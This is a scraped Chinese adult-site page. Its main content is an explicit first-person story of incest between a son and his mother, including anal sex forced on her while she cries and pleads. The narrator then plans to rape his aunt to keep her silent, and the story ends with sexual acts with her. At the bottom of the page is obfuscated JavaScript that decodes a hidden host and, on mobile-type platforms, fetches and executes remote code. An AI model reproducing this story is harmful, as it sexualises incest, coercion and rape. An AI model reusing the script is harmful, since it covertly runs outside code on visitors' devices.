返回

他的粉臀5c9

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

回到外婆家中,睡个午觉,晚上和爷爷、奶奶、小妗、妈妈一起看电视,乡下人睡得早,十点央︻,她们就回房去睡了。

我先到浴室里去洗个澡,回到小妗为我和妈妈收拾好的房里时,只见妈妈已经脱得一丝不挂,全身赤裸裸地横躺在木板床上,以手托着她的下颚,脸含春意,娇媚地对着我微笑着。

我这才想起妈妈去堕胎,打掉了因为不小心和我通奸后所怀孕的胎儿,算起来到今天刚好满了一个月,又可以和我玩床上游戏了。

我立刻飞快地剥下才刚洗完澡后穿上的衣服,跳上床去,先和妈来阵疯狂的热吻,接着再抚摸着妈那一对丰满肥挺的大乳房,搓揉着白嫩的乳峰,再低头去含着峰顶那鲜红得像草莓般的乳头,重温幼儿时吸母乳的滋昧,又用舌尖去含着妈妈深红色的乳晕,成圈圈状地不停舐咬着。

弄得妈妈像万蚁钻心似的趐麻酸痒,有些忍受不住地双手紧抱着我,上身挺着她的肥乳,好塞进我的口里,让我吮吸着;下身扭动着她的纤腰和肥臀,不断地把她的阴户贴紧了我的大鸡巴摩擦着,口里也浪叫着道:“乖儿子……啊啊……妈……真受……不了啦……痒……痒死妈了……哎呀……亲儿子……你……咬轻点……会痛……别……再……舐……再吸……了……儿子呀……你真要了……妈的……老命了……啊……啊……”

我吸吮了一阵子,然后抬起妈的玉腿,低头欣赏着妈妈全身中最美艳、最迷人的部位--那雪白而微有数条浅灰色妊娠纹的小腹下方,长满了一大片又浓、又长、又密、又黑的阴毛,盖住了整个小腹下方和她的阴户;我再拨开那一大丛阴毛,这才看到了妈那个春潮泛滥、饱满肥凸的桃源洞口。啊!这里就是生出了姐姐、我和妹妹的母体之圣地呢!

那毛茸茸、肥嫩嫩的大阴唇和里边粉红色的小阴唇上,流满了湿淋淋、滑腻腻的淫水哪!我伸出两根手指在那粒艳红色的小阴核上面,轻轻地揉捏了一阵。

“啊……啊!……”妈妈像触电了似地张开了她那双会勾魂摄魄的媚眼望着我,雪白的胸脯急剧地起伏着,肥嫩的大屁股扭摆着,口中叫道:“啊……亲儿子……你……你揉得……妈妈……难……难受死了……”

我还记得当初第一次就是用“口交”才姘上他的,这时也依样画葫芦地把嘴凑上妈的阴户,伸出舌头去舐着她那略带咸腥味道的淫水和小阴核,妈妈被我这种法国式的性技弄得是酸、麻、趐、骚、痒,五味俱呈,整个人都迷醉了,脸上的神情舒服适意中,又有一丝丝说不出的难过,那是春情发动的媚态哪!

我舔着舔着,她被我如此挑逗得性欲亢奋不已、骚火高炽、全身颤抖,使她差不多进入了疯狂的状态;阴道里也被我的舌尖一进一出、一吸一吮的动作给弄得淫水潺潺溢出,一发不可收拾地泄个不停,流得我满嘴都是。

她呻吟着:“唔……亲儿子……你……舐得妈……心里……好难受……妈妈……受不了……啦……乖……别再咬……咬那粒……小肉核嘛……哎呀……妈被你……咬……咬得……酸痒……死了……要命的……小冤家……啊……妈妈要……要泄……泄了……啊……”

妈妈浪得魂飞魄渺,泄了一阵又一阵的阴精,呻吟不绝地瘫在木床上,这种香艳风流的场景,若是给外人看到了,大概谁也不会相信我们之间竟然是确确实实的母子关系呢!

妈妈既畅美又舒服地把她那个肥凸多毛的阴户,用力地向上挺着,好像恨不得我把整根舌头都伸进她的小浪穴里;那张娇美的粉脸,春意盎然地充满了幸福的光辉;一双水汪汪的媚眼也半开半闭着,对我射出了骚荡淫浪的目光。我抬起头来,砸砸舌头,吞下妈妈活—来的那一大股淫水,再度趴在妈的胸前,吮吸着她的奶头。

妈妈才刚换过了一口气,又马上被我咬着乳尖,全身肌肤突然地又绷得紧紧的,泛出了情欲薰心的玫块红色泽,想是她阴户里骚痒难耐了,手抓着我的大鸡巴就要往她阴户里塞。

于是我抓住她的小腿,将她拉到床边,顺手拿了一个大枕头垫在他的肥臀下面,让她那只多毛肥凸的小穴挺出来,大鸡巴抵住阴户口,顺着阴缝一上一下地先磨了一阵。

妈妈被我磨得浑身酸痒无比、粉脸嫣红、春情洋溢、媚眼如丝、娇喘呼呼她淫声叫道:“小宝贝……乖儿……他的……小……被……被你磨得……痒死了……妈……妈……难受死……了……别再……磨了嘛……不要再……挑逗……妈妈了……好儿子……你快……插进来吧……”

我看着她的骚淫情态,听着她的浪声媚语,心中暗乐着,平日里表现一副高雅娴静,贵夫人模样的妈妈,这时屈伏在我的大鸡巴之下,是那么地风骚淫荡,哀求着我快干她的小穴,简直比倚门卖笑的妓女还要淫浪十倍哪!妈妈这只小浪穴,生我、养我、育我,现在还满足我的肉欲,真想生生世世再和她做一对偷情的母子啊!

我握着大鸡巴,对准了妈妈那艳红色、湿淋淋的肉洞,屁股猛一用力,就狠命地捣进去了。一连挺了几挺,粗长的大鸡巴已直捣到底,前端的大龟头插到了她的子宫里面,也胀满了他的整个阴道。

妈妈那紧窄的膣腔被我撑胀得紧紧的,子宫口也被我的龟头顶得密密的,使她浑身起了一阵颤抖,花心一会儿收缩、一会儿松开地颤动着,最妙的是那喇叭口上面的一圈嫩肉,就像一条阴户里的小舌头一般,一吸一吮地咬得我大龟头趐麻极了。

我身心大畅地将大龟头在他的子宫内轻揉旋转了好一阵子,抽出半条大鸡巴,再猛地掼入,爽得妈妈直叫道:“唔……嗯嗯……哼……亲儿子……妈妈……小穴里……生出来的……乖宝贝……妈妈……好痛快……啊……啊……妈……就让你……死……算了……小心肝……要命的……大鸡巴……啊……啊……得妈……妈妈又……又泄了……啊……顶死……我了……妈妈泄……泄给乖……儿子了……啊……”

一股热滚滚的淫液从子宫里直冲而出,烫得我的大龟头舒服透顶了,于是开始狠抽猛干,龟头像雨点般地吻着他的花心,只干得妈妈粉脸如春、媚眼如丝、花心一开一合地跳动着,淫水不断地由她小穴流出,香汗霪霪,双手紧抱着我,肥臀挺送,迎合着我的抽插狠捣。妈妈一脸骚媚浪劲儿,被我旯着她的肥臀猛干着,那大鸡巴捣得她俏嘴微张、媚波流盼、春漾眉梢。

我用足力气,大鸡巴整根插入了他的小骚穴里,猛抽狂插、九浅一深、旋转、摇动着,直干得她死去活来、飘飘欲仙、肥臀猛摇、喘喘地呻吟着道:“哎呀……小宝贝……亲儿子……你真要了……他的……命了……宝宝……得妈妈要……要上天……了……啊啊……好儿子……亲丈夫……妈妈快……乐……乐死了……你的鸡巴……真硬……又大……技巧也越来……越好了……玩……玩得妈妈……骨头要都……趐了……哎呀……捣进子宫……里面了……求……求求你……乖儿子……饶……饶了……妈妈吧……妈妈……又要……泄了……啊……骚穴……又……又要泄了……啊啊……妈妈……要……死了……啊……泄……泄死我……了……”

妈妈玉容渐渐发白,小肥穴中的浪水流个不停,出精太多了,终于她挺不住而昏迷了过去。我心里猜想,可能是她去做堕胎手术后,足足有一个月的时间没有吃过我这条大鸡巴,一时放纵地宣淫插干,才使她这个床上高手抵挡不住地举旗授降吧!

我抱着他的娇躯,用口对口为她渡着气,一会儿,才使她又醒转过来。我轻轻摸揉着妈妈那肥嫩的大屁股,忽然想到还没把大鸡巴插过她的小屁眼儿呢!就以妈妈这巨臀深沟的条件,插起来绝对不会比别的女人差的,我玩过了他的小骚穴和小嘴儿,不再玩玩她这个女人三大件的最后一宝,可真是有点可惜了。

于是把大鸡巴从她阴户中抽出,把他的娇躯翻转过来,用手抚弄着她雪白的大屁股,触摸着那小小紧凑的屁眼儿。

妈妈紧张地用手捂住她的屁眼,颤着声音道:“龙儿……你……嗯……你想要……插……插……妈……的……屁……屁股?……好儿子……他的……全身……都可以……任你玩弄……但是……但是那……排泄的……脏地方……不要……好吗……妈妈……替你……吸吸……大鸡巴……吧……”

我不理会他的抗拒,继续对着她的下半身施展着调情的动作,使她在半推半就之下,伏身屈膝,翘起肥白、丰满、柔嫩的大屁股。

我欣赏着那可爱、令人迷恋的粉臀,又是怜惜地一阵爱抚,再握着我那坚硬如铁的大鸡巴,在她光滑洁白的屁股上揉着,弄得妈妈满屁股都是透明的粘液,最后顶在她的小屁眼儿上探着。

妈妈被我抚摸得像是非常舒服地嗯嗯直哼着,也心知我要玩她的屁股是不可避免的事了,在新奇之下,她有点羞答答地回过头来抛了个媚眼给我,柔柔地道:“好龙儿!妈就给你玩玩我的屁股吧!但是你要轻轻地、慢慢地干进去呀!它还没有被男人玩过,他的小屁眼儿还是处女地哪!”

得到妈妈许可的特赦令,我先用双手分开妈妈纳肥肥的臀缝,露出菊花瓣也似的绯红色、嫩嫩的小洞,先用手指头在妈妈阴户里挖了些淫水,涂满了屁眼和我的大鸡巴上,再握着那庞然巨物,大龟头对准她屁眼洞口,腰部一挺,屁门儿猛地涨裂,在妈妈惨叫着:“啊……哎呀……痛……痛死……我了……妈妈……小……屁眼儿……要……破裂了……”的呼喊声中,我的大鸡巴已经干入了妈妈屁眼中半截了。

阵阵剧烈的痛楚,使妈妈痛得甩头摆臀、狂呼惨叫、汗水直流着,连她的眼泪都流出来了。我看着妈妈这种惨状,心想她这时恐怕要比新婚之夜被爸爸开苞时还要更痛哪!

妈妈一边叫喊着,一边求饶道:“哎唷……乖……龙儿……轻点儿哪……饶……饶了……妈妈……吧……”

我虽知道妈妈痛得厉害,但大鸡巴已干入半截,又不想就此半途而废,只得狠心地大力猛然一挺,整根地进了她的屁股里。

在大鸡巴全部进入了他的旱道后,我一边轻抽缓送,一边用手揉着她的屁股肉,安抚着他的情绪,再摸着她全身赤裸裸的肌嚼,渐渐伸到她胯下的阴户里,玩弄着她的阴核,以挑逗她的欲火。

妈妈在我细心的抚慰之下,小屁眼儿慢慢地松动了,直肠也渐渐地适应了我大鸡巴的抽插,叫喊声也越来越小了,又开始摇摆着肥嫩的大屁股来承欢迎送,也不知道是迎合我的手指还是我的大鸡巴?阴户里也被我挖得酸痒澈骨地流了一大堆的淫水,顺着大腿内侧滴下来,我感觉到他的屁眼儿极小,又特别地紧窄,在我的大鸡巴插入和抽出来时,妈妈那婉转娇啼的浪吟声让我倍觉兴奋;而那高突丰隆的大白屁股,款摆迎凑,骚浪地大摇特摇,更让我欲火高烧。

我趴伏在妈妈娇嫩的背上,感到像是睡在一堆软绵绵的棉花上头,既温暖又柔细地好受极了。大鸡巴干在她屁眼儿里也和插在阴户中不同,风味奇佳、紧美干热,另有一番风味。

妈妈四肢大张地伏在大床上浪扭着,我则趴在她的背上,把大鸡巴干入她的屁股里,两个人的姿势就像野狗交合一样,从墙壁上挂着的镜子里,可以看见妈妈那为了解决麻痒、讨我欢心地搔首弄姿、欲火四射、媚态十足、娇艳浪荡地诱惑我,让我享受交欢的乐趣。

妈妈浪态横溢地用她的大屁股紧夹着我的鸡巴,急摆几下,又抬起来旋动不停,真不愧是有过二十年床上经验的高手,不多久就知道怎么摇摆才能迎合男人的插干。

妈妈让我尽情地享受、恣意地寻欢,被我捣得前后洞里都骚痒难耐地浪水直流、娇媚淫荡地呻吟着道:“哎呀……龙儿……啊……你真是……妈妈……命中的……魔星……妈……的……前……后洞……都给你……玩……遍了……大鸡巴……舒服了吧……用劲啊……他的……心肝……乖宝宝……唔唔……干……干死……我吧……好哥哥……他的……儿子亲丈夫……你的……大鸡巴……好坚硬……玩得……妈要……浪……浪死了……快点儿……出来吧……妈妈……受不住……了……大屁股……小浪穴……妈妈……要……要泄……泄了……啊……啊……”

在一阵肉紧的狂插之后,我终于第一次把精液洒向他的屁眼儿里,想来妈妈也是第一次有男人把阳精泄在她的大肠里,这才完成了我想要开妈妈大白屁股“后苞”的心愿。

我抽出大鸡巴后,只见妈妈那原来紧闭着的小屁眼儿,撑开了一个小洞,泄在里面的乳白色精液、正慢慢地由她红通通的洞口流出来呢!

我随手抓过了几张卫生纸,仔细地为妈妈拭者屁眼,当我在清理自已的大鸡巴时,忽然见到窗外人影一闪,我和妈妈都瞥见了小妗那姣美的脸庞在窗口一掠而逝。

妈妈吓得花容失色地催我快想个办法解决,否则这亲生母子乱伦的事,万一由她口中传了出去,在外婆家这纯朴的小乡镇里,可是一件天大的新闻哪!

我略一思考,便打定了主意,便要妈妈不要慌张,我要到小妗房里去和她谈判,如果真没办法时,干脆强奸了她,谅她也不敢把被奸的事说出去。要妈妈自己先睡了,就一溜烟地潜到了小妗房中去了。

我知道小舅去了台南参加农产品特展,尚未回家,登时色胆包天,决定一不作、二不休,索性奸了小妗,可不就没事了么?尤其小妗也算是个美人呢!这个天赐良机可该我享用她美丽的肉体了。

我来到小妗床前,只见她侧着身躯,面向墙壁伏卧在床里,我并没有刻意掩饰我的脚步声,她一定知道了我的来临,却害羞地不敢面对着我。我推推她的肩膀,还是不见她有所动静,望着曲线玲珑的背影,色胆一起,于是伸手替她脱掉了薄薄的睡衣。啊!里面光溜溜地,根本连内衣都没有穿嘛!

伸手到小妗身上乱摸一通,她只是抖着娇躯而不敢睁开眼睛,毕竟她是个有夫之妇,况且是我的长辈,只好装着熟睡任我为所欲为地摆布了。

我双手在她全身雪白的肌肤上游走着,小妗想是刚才偷看了我和他的春宫好戏,引发了她的性欲,当我的手贴在她趐胸上抚捏时,可以感觉到她的心脏狂跳着,闭着双眼的娇靥满泛着红晕,欲火高涨了!

我一边搓揉着,一边仔细地欣赏着我这位俏丽的小妗,只见她虽已年过三十,但肌肤还是白白嫩嫩的,像个二十出头的少女、一张雪白细嫩的瓜子脸、两道新月般的眉毛,小巧而挺直的鼻梁、红嘟嘟的樱唇、一双长长的凤目紧闭着,上面那细长而卷卷的睫毛正颤颤地动着哪!

目光再扫到她胸前,莹白如脂的胸肌上,鼓起两座肥嫩的大奶子,乳峰夹着的乳沟,深如山谷、玉腿修长,粗细均匀,恰到好处、全身雪白透红,若隐若现的阴缝在她小腹底下的耻毛之中掩藏着,好个娇嫩的肉体呀!

我的双手在她高耸的趐乳上放肆地捏弄着,猛按、猛搓,再轻轻地扣揉着峰顶那两颗微微颤动着的奶头;用一只手往她下身摸去寻幽探秘,扣得她小穴里的淫液如喷泉般涌出,春上眉梢、鼻息粗重地轻哼出声,玉腿也自动地往两旁分开了,好让我的手更方便行动。

我想要考验小妗的耐力,看看她到底能够忍受到什么时候?于是便低下头去,伸出舌头往她的骚穴里探入,不停地旋转、吸吮着。

不到一分钟,就听到小妗的浪语声道:“啊……啊……唔……老公……亲丈夫……我……受不了啦……快……快上来……插……插我……情哥哥……我的……小情人……好甥儿……快插……啊……小浪穴……痒死了……求……求求你……快……快插……小浪穴……吧……奸死……我吧……啊……”

小妗的淫水一股一股地沿着她的肥臀沟缝往下直淌着,我心想她终于忍不住了,爬起身来再次尽情地捏揉着她的大肥乳一阵子,小妗把我报在她胸前,伸出手引导着我的大鸡巴,抵住她肥厚的阴唇,玉腿自然大张,好让我容易干她的穴。

我见小妗的阴户中一开一合地直流着淫水,又急抬肥臀,摇摆个不停,可见她已色急的忍不住了,把屁股猛一下沉,“噗滋!”一声,大鸡巴借着淫液的润滑,一下子全根干到了底,她的脸上这才现着满足的笑容,仿佛得到了充实感。

我把大鸡巴干了进去后,下下猛插,次次都顶中她的花心,美得她嗲声浪道:“喔……噢……舒服……极了……好爽……好爽……哦……亲亲……大鸡巴……哥哥……你真……能……干……小浪穴……好舒服……好……好爽……哥……小浪穴……妹妹……爱你干……喔……亲儿呀……用力吧……快……快快……我酸……酸……死了……”

小妗白嫩的玉手直摸着我的胸膛,并且摇臀扭腰地迎合着我的大鸡巴,我快慢自如地驰骋在她的温暖如玉的肉体上,享受着小穴里夹、吻、吸、缩的滋味,一面欣赏着她被干的淫态,只见她美艳迷人的娇靥上,红云满布,芋<相映,娇润如水;媚波横飞,水汪汪地荡漾着异彩;柳眉时皱时展,一颦一笑均能勾魂夺魄,暗含无限春意;琼鼻微耸,不时发出迷人的浪哼声;微微上翘的小巧红唇,半张檀口,吐气芬芳;娇躯扭颤,如波浪般地抖动着,姿势之美,诱得人心旌猛然动摇;那对高挺的豪乳,肥尖上翘,随着插干的律劲,抖颤旋荡,令人陶醉;而她美艳的姿色、丰腴润滑的肉体、以及狐媚骚浪的神色,尽情地施展着,让我享尽了温柔甜蜜的滋味。

看着这五光十色的骚劲媚态,使我淫性大起,双手按着她玉乳,摸、捏、捻、揉着,用力地把我的大鸡巴干入她的小穴中,一个急抬,一个猛插,“卜吱!卜吱!”的干穴声大起,回绕在小妗的房里。

这个娇艳的美妇,被我挑弄得欲火大炽,周身酸痒,骚浪得不克自制地急速摇摆着肥臀,口里像哭求地叫着道:“亲亲……我……我好难过……啊……快……加劲地捣……啊……天……呀……好甥儿……我心爱……的……小亲丈夫……可怜……小浪穴……吧……唔……我要……难过死了……唔……快……用力……我吧……骚穴……痒死了……快……快嘛……”

小妗的骚浪劲儿己经到了最高的颠峰,急需大鸡巴的狠干,才能解除她体内的欲火,她的双臂紧抱着我的背部,身体狂扭猛摇,呼吸急喘,呓语连连地大声叫嚷着。

我原来就被她的娇媚迷住了,陶醉在她的骚媚之中,现在再见到她狂热的动作,加上耳听她的婉转娇吟,更是发狠地猛干狂捣着。

一阵急插之后,小妗被我干得阴户生热,气儿直喘地颤抖着大泄特泄,痛快地昏迷了过去。我想小妗一定是饥渴了很久,下身挺得更急更快,存心要好好喂饱她的小骚穴,以免她把我和妈妈母子通奸的事情泄露出去。

大鸡巴直干,命中花心,旋转磨绕,又把小妗给插醒了,她双手死死地缠住我,小穴里也一松一紧地自动夹吸着,真没想到又干到了一个千中选一的妙穴啦!

大鸡巴下下直入肉,又插得小妗浪叫道:“……喔……啊……哥……你的……大鸡巴……插到……我心里……去了……好爽……嗳呀……亲……亲丈夫……小浪穴……乐……乐死了……我要……永远做……做……做你的……情妇……才……才能……常常和……亲……亲哥哥……插干……喔……我……我不行……了……又要……丢……丢了……”

一股浓热的阴精又猛地由她小穴里直冲而出,烫湿了大龟头,阴户内的肉壁再一次地收缩着,我也在一阵麻痒之后,舒服地活—了精子到她的子宫内。小妗泄了阴精后,还是一直猛抱着我,下部和我的大鸡巴紧紧地粘着,好像舍不得让精水流到阴户外似的。

等到她渐渐地恢复了神智,才媚媚地对着我说道:“乖儿!亲丈夫,你真是小妗的救星,啊!今后小妗的身心都交给你了,你舅舅在床上太差劲儿了,每次没五分钟就完上,小妗到现在还没升过孩子,我要为你养个仔仔,我的好甥儿,你就让小妗为你怀孕吧!将来生下你的儿子一定会像你这么英俊的。”

我抱着她甜蜜地吻着,要求她不要把我和他的奸情泄露了,她连忙满口答应,只求我莫要把她给抛弃了。我当然一口就允诺了,并且愿意再和她暗中偷情,让她怀孕,做个地下爸爸,反正干穴的事儿男人又不吃亏,多个随时能插的小穴又有何妨?又是一阵爱怜的抚摸后,我向她道了晚安,我这才悄悄地溜回客房里,钻进他的热被窝里,和她共效鸳鸯的交颈而眠了。

评分
相关推荐
3.0分

3.0分 美母的丰满臀臀edb

3.0分

3.0分 在他的床上操他的老婆d5a

3.0分

3.0分 粉嫩的极品鲍鱼884

3.0分

3.0分 母亲粉嫩的阴唇b67

3.0分

3.0分 他、他和我俩的真实故事71b

3.0分

3.0分 少妇的粉红色内衣d69

3.0分

3.0分 她那粉红色的肉洞514

3.0分

3.0分 小姨子粉红的乳头2cc

3.0分

3.0分 他发现他的老婆被人强奸了904

3.0分

3.0分 他发现他的老婆被人强姦了489


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};